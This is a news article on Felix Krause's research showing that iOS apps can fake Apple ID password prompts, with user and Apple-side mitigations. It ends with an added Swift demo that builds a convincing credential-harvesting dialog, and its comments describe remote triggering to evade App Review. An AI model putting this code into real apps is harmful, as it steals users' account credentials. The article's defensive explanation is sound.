Researcher: It’s Easy to Steal iOS Passwords, Just Ask for Them

Anyone who’s spent more than a few minutes using iOS has been prompted to enter their Apple ID (iTunes) password. In principle this ensures that no one but you can get at your account data. However, iOS asks for that password quite often, and security researcher Felix Krause points out that this well-intentioned practice can have the opposite effect.

According to Krause, Apple’s constant insistence that users type in their passwords leaves them open to phishing. It’s not only the frequency of the requests: the way iOS asks for the password makes it very easy for a malicious developer to steal it. You might think you’re typing your password into yet another Apple dialog box, but it could be a fake drawn by the app you happen to be using.

iOS asks for your password after system updates, when purchasing content under certain conditions, and when apps reach out to Apple services like iCloud and Game Center. Users are therefore trained to expect that dialog box to appear at any time. Apple gives developers a standard UI component, UIAlertController, that can produce a dialog box indistinguishable from the system prompt that keeps asking for your password. Using that popup to harvest passwords is a simple matter, and if the app also has the user’s email address, the attacker holds the full credential pair and the account is compromised.

Krause has not included example code for this attack, but he says it’s trivially easy to set up. He had hoped Apple would address the issue without public pressure, but it’s something he’s been following for several years. Until Apple makes changes, users can protect themselves by pressing the home button before entering a password into any dialog box. If the popup was spawned by the app, it disappears along with the rest of the app; a genuine system dialog stays on the screen. You can also dismiss the popup and enter your password in Settings instead, or look for the lock screen notification.


Apple has a famously tight grip on the App Store: it constantly rejects apps for seemingly minor issues. Krause notes, however, that it would be easy to keep the fake UIAlertController hidden from Apple until after the app is approved and then trigger it remotely. Possible mitigations on Apple’s end include showing the app’s icon in UIAlertController dialog boxes, so the user can see which app is asking, or simply asking for the iTunes password less often. At the least, Apple could route users to the Settings interface to confirm their identity rather than rely on the easy-to-fake popups.
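To make the look-alike dialog described above concrete, here is an added illustration written for this page. It is not Krause’s code (he deliberately withheld his), and the title and message strings only approximate the wording of the real Apple ID prompt; the class name and the method name are assumptions for the demo. Everything in it is ordinary public UIKit, which is exactly the point: nothing here needs a private API or an entitlement that App Review would flag.

```swift
import UIKit

// Added illustration for this page, not code from Krause or Apple.
// Builds a UIAlertController styled like the system Apple ID prompt.
// The dialog strings approximate the real prompt and are assumptions.
final class PhishingDemoViewController: UIViewController {

    override func viewDidAppear(_ animated: Bool) {
        super.viewDidAppear(animated)
        // A malicious app would gate this on a remotely fetched flag so it
        // stays dormant during App Review; the demo shows it immediately.
        presentFakeAppleIDPrompt(prefilledEmail: nil)
    }

    /// Presents the look-alike prompt. If the app already knows the user's
    /// Apple ID email it can show it in the message the way the real dialog
    /// does; otherwise it simply asks for the email as well.
    func presentFakeAppleIDPrompt(prefilledEmail: String?) {
        let message = prefilledEmail.map { "Enter the password for your Apple ID \($0)." }
            ?? "Enter your Apple ID and password."
        let alert = UIAlertController(title: "Sign In to iTunes Store",
                                      message: message,
                                      preferredStyle: .alert)

        if prefilledEmail == nil {
            alert.addTextField { field in
                field.placeholder = "Apple ID"
                field.keyboardType = .emailAddress
                field.autocapitalizationType = .none
                field.autocorrectionType = .no
            }
        }
        // isSecureTextEntry gives the masked password field users expect.
        alert.addTextField { field in
            field.placeholder = "Password"
            field.isSecureTextEntry = true
        }

        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
        alert.addAction(UIAlertAction(title: "Sign In", style: .default) { [weak alert] _ in
            let fields = alert?.textFields ?? []
            let email = prefilledEmail ?? fields.first?.text ?? ""
            let password = fields.last?.text ?? ""
            // A malicious app would send this pair to its own server here.
            // The demo only reports locally that something was captured.
            print("captured Apple ID:", email,
                  "password length:", password.count)
        })
        present(alert, animated: true)
    }
}
```

Note that the alert is owned by the app’s own view controller hierarchy. That is why Krause’s home-button check works: backgrounding the app takes this alert away with it, whereas a genuine system prompt is drawn outside the app and stays put.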
